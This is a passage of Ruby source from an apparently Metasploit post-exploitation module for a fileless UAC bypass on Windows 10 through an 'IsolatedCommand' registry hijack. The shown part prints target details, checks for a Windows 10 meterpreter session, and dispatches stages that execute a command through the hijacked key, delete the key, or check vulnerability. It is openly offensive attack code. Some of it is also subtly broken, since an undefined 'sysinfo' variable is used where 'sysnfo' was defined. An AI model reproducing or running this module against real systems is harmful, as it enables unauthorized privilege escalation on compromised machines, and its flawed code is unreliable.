403 | print_line(" UAC_LEVEL : #{report_level}")
404 | print_line("")
405 | print_line(" HIJACK_KEY : #{vul_value}")
406 | print_line(" HIJACK_HIVE : #{vuln_stats}")
407 | print_line(" VULN_STATUS : #{report_tw}")
408 | print_line("")
409 | print_line("")
410 | Rex::sleep(1.0)
411 | end
412 |
413 |
414 |
415 |
416 | # ------------------------------------------------
417 | # MAIN DISPLAY WINDOWS (ALL MODULES - def run)
418 | # Running sellected modules against session target
419 | # ------------------------------------------------
420 | def run
421 | session = client
422 |
423 | # Variable declarations (msf API calls)
424 | oscheck = client.fs.file.expand_path("%OS%")
425 | sysnfo = session.sys.config.sysinfo
426 | runtor = client.sys.config.getuid
427 | runsession = client.session_host
428 | directory = client.fs.dir.pwd
429 |
430 |
431 | # Print banner and scan results on screen
432 | print_line(" +----------------------------------------------+")
433 | print_line(" | enigma fileless UAC bypass 'IsolatedCommand' |")
434 | print_line(" | Author : r00t-3xp10it |")
435 | print_line(" +----------------------------------------------+")
436 | print_line("")
437 | print_line(" Running on session : #{datastore['SESSION']}")
438 | print_line(" Computer : #{sysnfo['Computer']}")
439 | print_line(" Operative System : #{sysnfo['OS']}")
440 | print_line(" Target IP addr : #{runsession}")
441 | print_line(" Payload directory : #{directory}")
442 | print_line(" Client UID : #{runtor}")
443 | print_line("")
444 | print_line("")
445 |
446 |
447 | #
448 | # the 'def check()' funtion that rapid7 requires to accept new modules.
449 | # Guidelines for Accepting Modules and Enhancements:https://goo.gl/OQ6HEE
450 | #
451 | # check for proper operative system (windows-not-wine)
452 | if not oscheck == "Windows_NT"
453 | print_error("[ ABORT ]: This module only works againts windows systems")
454 | return nil
455 | end
456 | # check for proper operative system (windows 10)
457 | if not sysinfo['OS'] =~ /Windows 10/
458 | print_error("[ ABORT ]: This module only works againt windows 10 systems")
459 | return nil
460 | end
461 | # check for proper session (meterpreter)
462 | # the non-return of sysinfo command reveals
463 | # that we are not on a meterpreter session!
464 | if not sysinfo.nil?
465 | print_status("Running module against: #{sysnfo['Computer']}")
466 | else
467 | print_error("[ ABORT ]: This module only works in meterpreter sessions!")
468 | return nil
469 | end
470 | # elevate session privileges befor runing options
471 | client.sys.config.getprivs.each do |priv|
472 | end
473 |
474 |
475 | # ------------------------------------
476 | # Selected settings to run
477 | # ------------------------------------
478 | if datastore['EXEC_COMMAND']
479 | ls_stage1
480 | end
481 |
482 | if datastore['DEL_REGKEY']
483 | ls_stage2
484 | end
485 |
486 | if datastore['CHECK_VULN']
487 | ls_stage3
488 | end
489 | end
490 | end
491 |
--------------------------------------------------------------------------------